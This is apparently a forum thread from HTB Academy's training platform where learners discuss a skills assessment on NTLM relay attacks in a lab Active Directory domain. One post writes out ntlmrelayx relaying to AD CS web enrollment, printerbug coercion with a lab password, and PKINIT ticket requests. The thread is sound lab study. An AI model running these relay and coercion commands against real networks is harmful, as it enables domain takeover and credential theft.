NTLM relay attacks skills assessment question 2

HTB Content Academy
1

Hello everyone,

I’ve been encountering a challenging issue for the past two days and could use some guidance. Here’s what I’ve accomplished so far:

However, I’ve hit a roadblock. I’m unable to self relay onto the IP address 172.16.119.70.

The main issue is that none of the relays I’ve captured seem to have command execution capabilities, nor do they have the ability to write on shares on any of the hosts. This has left me at a standstill, and I’m unsure of the next steps to take.

Could anyone provide some advice or point me in the right direction to resolve this? Any help would be greatly appreciated.

Thank you!

2

I’m glued aswell, any help and/or guidance would be appreciated

3

i finally got this
if anyone need help feel free to dm me

4

I am stuck on question 2 as well. No available shares, everything I have tried does not lead to a compromise of BACKUP01 machine.

Finally solved question 2. Phew!!

5

Hi, Could u give me a hint on how you solved question two?
I was able to solve question 1 and 3 and I have the following information

Username Password
dob ?
mozhar ?
plaintext$ password123! (own computer)
sql_ftp_test SQ…3!
sqlftp Her…ord!
BACKUP01$ hash (not crackable)

I tried coercion several times and in different combinations, but I was able to access any share with writable access.

6

I wish I could remember… but unfortunately I did not take notes for this one. IF I’M NOT WRONG, it had to do with Certificate.

7

Hello,
Can someone help me with question number 2.
I got the the following table with credentials:

Username Password
dob ?
mozhar ?
plaintext$ p…!
sql_ftp_test SQ…3!
sqlftp Her…ord!

I tried the ESC8 Attack:

# with DC01
python3 gettgtpkinit.py -dc-ip 172.16.119.3 -pfx-base64 $cert 'inlanefreight.local/dc01$' dc01.ccache

certipy auth -pfx dc01.pfx -dc-ip 172.16.119.3

# With BACKUP01$
python3 gettgtpkinit.py -dc-ip 172.16.119.3 -pfx-base64 $cert 'inlanefreight.local/backup01$' dc01.ccache

With both of them I get the response: Error Name: KDC_ERR_CLIENT_NAME_MISMATCH Detail: "Error message not found! Err code: 75"

What am I doing wrong here?

hash was obtained using ntmlrelayx and printerbug:

# Relay for certificate
ntlmrelayx.py -t http://172.16.119.3/certsrv/certfnsh.asp -smb2support --adcs --template Machine

# Printerbug
python3 printerbug.py inlanefreight/plaintext$:'EuFX}3KM6TFv:nr'@172.16.119.20 172.16.119.3
8

It took me like a couple or three of days to solve this skill assessment, so here goes some tips for some people struggling in the future.

Whenever you are stuck with relaying NTLM, remember what you can do by checking the road map from Hacker Recipes: Road map image.
The first time I saw this image, it was confusing for me, but after completing the following sections I understood what it meant.

Question 2:

What @halfluke said is key, review the Advanced NTLM Relay Attacks Targeting AD CS section.

Question 3:
I do not understand how @Patota was able to obtain the password of user sqlftp before finishing question 2. Since, at least as of October 9, 2024 and the way I have solved it, question 3 is a continuation of question 2, and is not independent.

Question 4:
Is much easier than question 2, but in case you’re struggling you might want to review the Farming Hashes section, taking advantage of what you have achieved with question 3.

1 Like
9

Thank you this was helpful. Currently stuck on Question 3 trying to figure out how to leverage the Question 2 access.